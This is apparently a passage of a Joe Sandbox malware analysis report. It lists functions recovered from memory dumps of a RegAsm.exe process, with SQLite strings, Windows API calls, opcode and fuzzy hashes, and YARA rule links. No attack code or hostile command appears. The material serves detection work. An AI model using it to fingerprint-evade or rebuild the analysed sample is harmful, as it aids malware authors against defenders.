Download Yara Rule

Strings

second argument to nth_value must be a positive integer, xrefs: 19A6F0C4

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: second argument to nth_value must be a positive integer
API String ID: 0-2620530100
Opcode ID: 8051cbfd3b724fd96b4d29dca73a1435b5e97e50c4275fc3321cf5273c2c747d
Instruction ID: 44d29a47479b1bbb47fc1a8e3a19dd47a898c26b87dd87e8b321fe797b4430da
Opcode Fuzzy Hash: 8051cbfd3b724fd96b4d29dca73a1435b5e97e50c4275fc3321cf5273c2c747d
Instruction Fuzzy Hash: 08315AB68003029BCB109F14DC8161677ECFF40F20F8C8629ED65A62E1F732E95C8692

Uniqueness

Uniqueness Score: -1.00%

Function 19AA5280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19AA5301
database corruption, xrefs: 19AA52FC
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19AA52F2

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 0261245913cd2ccb59acda8107b29d0678312de1861d6413c6b41dd58e0cd0e8
Instruction ID: dc0ce519aadf5e795ee0f82f53132f4de9b05f74602197a2f3d45b36df41cbe6
Opcode Fuzzy Hash: 0261245913cd2ccb59acda8107b29d0678312de1861d6413c6b41dd58e0cd0e8
Instruction Fuzzy Hash: CC11577BA0020067CB105A48FC00CDFBFA9DFC46B6F0D45A5FA8857162D323E925D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 19AAFD60 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19AAFE82
database corruption, xrefs: 19AAFE7D
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19AAFDE6, 19AAFE61

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: d0672a996dec1bdbfa744c574f98d9b6672f5cfa51058d502164866f79cd3153
Instruction ID: c163deda42699b39a0fb143f86e01da84b7d6793a714a515519a6608afc8791d
Opcode Fuzzy Hash: d0672a996dec1bdbfa744c574f98d9b6672f5cfa51058d502164866f79cd3153
Instruction Fuzzy Hash: FB31F9681143818AD3198F24C400366BB61BF65B08F68D4CDD4858F797E37BC48BDB96

Uniqueness

Uniqueness Score: -1.00%

Function 19ABD6F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

%s%s, xrefs: 19ABD725

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%s
API String ID: 0-3252725368
Opcode ID: 9b3d7068a5f937d1c0cc16f8b085ee06f4394d6e94f0ee220c42a5092e57b18e
Instruction ID: 71af7b32e030a6b115925c6c810cc693e5fe83f9848789d84efe679e8f9c3608
Opcode Fuzzy Hash: 9b3d7068a5f937d1c0cc16f8b085ee06f4394d6e94f0ee220c42a5092e57b18e
Instruction Fuzzy Hash: 2811D2B69002B49BD7009B24DC84A9737ADFF80A19F080165FA8DCB208E7359559CBE7

Uniqueness

Uniqueness Score: -1.00%

Function 19B11F70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

JSON path error near '%q', xrefs: 19B11F92

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: JSON path error near '%q'
API String ID: 0-481711382
Opcode ID: 1823cf06d4335d3e004d705eff48b868cdce97034e3d235c299bb00226602d31
Instruction ID: bf76859934c067d464f9fc22d1220bcf305416bd3b9e520e3cf4630bd8ec8ac9
Opcode Fuzzy Hash: 1823cf06d4335d3e004d705eff48b868cdce97034e3d235c299bb00226602d31
Instruction Fuzzy Hash: A80126B26092117FDB149B54DD00B9B7BD4EF41730F28466CF9959A2D0DB71F80183E2

Uniqueness

Uniqueness Score: -1.00%

Function 19A71DF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

Strings

misuse, xrefs: 19A71E59
%s at line %d of [%.10s], xrefs: 19A71E63
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19A71E53

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3564305576
Opcode ID: 436104e38e1d4eedf36deeac6311d4e3725c928d27e97fc8e98c84e0df55e7b0
Instruction ID: c16e8ccd9c49359695b6f1295763d902f97e40278393d53997cbf2721cf95adc
Opcode Fuzzy Hash: 436104e38e1d4eedf36deeac6311d4e3725c928d27e97fc8e98c84e0df55e7b0
Instruction Fuzzy Hash: BC11E7342086909FD308CE28D845A66BBE9BF55F4CF080098F485CB362D336FA09C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19A8F0E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

INSERT INTO %Q.%Q(%Q) VALUES('flush'), xrefs: 19A8F105

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO %Q.%Q(%Q) VALUES('flush')
API String ID: 0-2312637080
Opcode ID: d7762a7d792f325ebd616bc572d99694d9dceb5a96a32fdbcc87b44cfc5f6b41
Instruction ID: 407fef2b5e52bd6e997aa000b8068dbe5b332cb376e30a02b9043371de25afb5
Opcode Fuzzy Hash: d7762a7d792f325ebd616bc572d99694d9dceb5a96a32fdbcc87b44cfc5f6b41
Instruction Fuzzy Hash: E601B1363042425FD321866EFC40F97B7DCEBC4A21F09046EF7ADC3201D361A88983A1

Uniqueness

Uniqueness Score: -1.00%

Function 19AD9180 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

%s_stat, xrefs: 19AD9192

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s_stat
API String ID: 0-920702477
Opcode ID: 1fdbc54ea5af427e6b3e11510ef9daf8ff66bb1a5d8871180b8a7b95cc64621e
Instruction ID: b43ecabb9f3f16547ae478d0550aa84e3115352d6c54ef66b3a66f7499d18d9d
Opcode Fuzzy Hash: 1fdbc54ea5af427e6b3e11510ef9daf8ff66bb1a5d8871180b8a7b95cc64621e
Instruction Fuzzy Hash: EDF02733A053523BD700867DFD80B86FBDABB80560F4C8625F90CA2154C312BCA64391

Uniqueness

Uniqueness Score: -1.00%

Function 19A87F70 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON

Download Yara Rule

Strings

CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN), xrefs: 19A87F76

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(key,value,type,atom,id,parent,fullkey,path,json HIDDEN,root HIDDEN)
API String ID: 0-3072645960
Opcode ID: 004dd3c645e2e4657caeb0c4f1076ff29a2ee7b4c0b70e64592b0a668ff9c0d4
Instruction ID: c45546e85b7d86268302345217b11950f126c9d605304cc167fa22017e0c153e
Opcode Fuzzy Hash: 004dd3c645e2e4657caeb0c4f1076ff29a2ee7b4c0b70e64592b0a668ff9c0d4
Instruction Fuzzy Hash: A8F0F03A60430287D7005F19FC01B89BBD4AFD0B22F5D4139F8849A2A0EB60A89AC7A1

Uniqueness

Uniqueness Score: -1.00%

Function 19B66B50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 9COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19B66B5E
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B66B50
cannot open file, xrefs: 19B66B59

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$cannot open file$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1799306995
Opcode ID: 906ee98c79ce5f3480b04b1e9f300f6806bfaba637b0c45104f21682aa79b379
Instruction ID: bedb82a2f5b731e290df76e33a98b2bbea7aff9c93e6529f2438cccc2bb8fa61
Opcode Fuzzy Hash: 906ee98c79ce5f3480b04b1e9f300f6806bfaba637b0c45104f21682aa79b379
Instruction Fuzzy Hash: CBB09B5954418036D600E554DD01FD62C515794A08FCDC49479D5352A5D095C4508521

Uniqueness

Uniqueness Score: -1.00%

Function 19A87DA0 Relevance: 6.2, APIs: 4, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a56ee54514f3a0848c8611e3951db1f7948ec99f0d65f664b2ad1c8ccc9ee0f2
Instruction ID: fb598c1f8aa344b70afa39ba83eca3c3be6ff951608165d2fb4f4862dc3ca5df
Opcode Fuzzy Hash: a56ee54514f3a0848c8611e3951db1f7948ec99f0d65f664b2ad1c8ccc9ee0f2
Instruction Fuzzy Hash: 1641C0366006019FD314CF19D980A12FBE4FB84729F18856AE94687EA2D772FC69CB90

Uniqueness

Uniqueness Score: -1.00%

Function 004105E0 Relevance: 6.1, APIs: 4, Instructions: 100COMMON

Download Yara Rule

APIs

GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410602
GetLastError.KERNEL32(?,?,00000001), ref: 00410610
GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00410648

Part of subcall function 00411470: GetProcessHeap.KERNEL32(00000000,?,?,0041067B,00000000,?,?,00000001), ref: 0041147D
Part of subcall function 00411470: HeapFree.KERNEL32(00000000,?,0041067B,00000000,?,?,00000001), ref: 00411484

wsprintfA.USER32 ref: 00410692

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HeapInformationLogicalProcessor$ErrorFreeLastProcesswsprintf
String ID:
API String ID: 837085947-0
Opcode ID: 0d9c4edbb7559f74c35b9bd252e70d27db301ce926e9fbfe6edfc568aac6d805
Instruction ID: 366bb74dd286f18a7a484b3067aafd1d3a88729660cbb4a48cba89bc7db310ad
Opcode Fuzzy Hash: 0d9c4edbb7559f74c35b9bd252e70d27db301ce926e9fbfe6edfc568aac6d805
Instruction Fuzzy Hash: 69210676E02128A7D7209A59BC40AFF77A8EF82714F14017BFC08D7201D7798EE582D9

Uniqueness

Uniqueness Score: -1.00%

Function 19A8B1F0 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction ID: f77e1a04dcc4245aa52a475bcf50418f2848cc22d1b1fbf856813fcb78931375
Opcode Fuzzy Hash: 2c84fadece956eb82bcd06ee462d33b28814fba88082786c6e23e5494ba88420
Instruction Fuzzy Hash: 4431C275504B429FD360CB25F84069BBBE4BF85712F08992DD8DA86A41E331F48CC791

Uniqueness

Uniqueness Score: -1.00%

Function 19C5F4CA Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,00000000,?,?,00000000), ref: 19C5F4E0
GetLastError.KERNEL32(?,?,?,?), ref: 19C5F4ED
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 19C5F513
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 19C5F539

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: 81ea7bfcb7b8f9021c414de18f828aa6cd9ce505108325d342443692c8b9947c
Instruction ID: 3b0bd3e5ff816a4161192b85abb0fe4e3a74c5a38db7a7dbb0db13532d694a81
Opcode Fuzzy Hash: 81ea7bfcb7b8f9021c414de18f828aa6cd9ce505108325d342443692c8b9947c
Instruction Fuzzy Hash: 48115AB290016ABBEF058FA5DC48ADE3F79EF00760F148144F969A21A0D7319A51DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A729 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 0041A74F

Part of subcall function 0041A57B: __fltout2.LIBCMT ref: 0041A5A6

__cftog_l.LIBCMT ref: 0041A775
__cftoe_l.LIBCMT ref: 0041A7A7

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

